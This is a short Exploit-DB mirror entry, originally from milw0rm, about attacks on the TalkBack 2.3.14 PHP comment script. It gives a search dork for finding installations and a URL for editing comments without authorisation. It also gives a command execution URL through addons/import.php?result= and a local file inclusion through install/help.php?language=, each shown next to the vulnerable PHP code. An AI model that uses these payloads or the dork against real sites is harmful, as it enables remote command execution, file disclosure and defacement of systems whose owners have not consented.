exploit-db-mirror/platforms/php/webapps/9095.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

21 lines
704 B
Text
Executable file

JIKO No-exploit.Com
Download:http://scripts.oldguy.us/talkback/downloads2/talkback2.3.14.zip
Script : talkback V 2.3.14
Dork:inurl:test.php Powered by TalkBack
--------------------------------------------
Edit Comment ~[+]
talkback/comments.php?edit=1&edit_id=2&
Command ~[+]
talkback/addons/import.php?result=[Command]
Code;
$last_line = system($command, $result);
Local File ~[+]
Note : if floder install not deleted
http://localhost/test/talkback/install/help.php?language=[File]
code;
$file = "../language/{$_REQUEST['language']}.php";
if (!is_file($file))
exit("Language file '$file' does not exist");
include ($file);
# milw0rm.com [2009-07-09]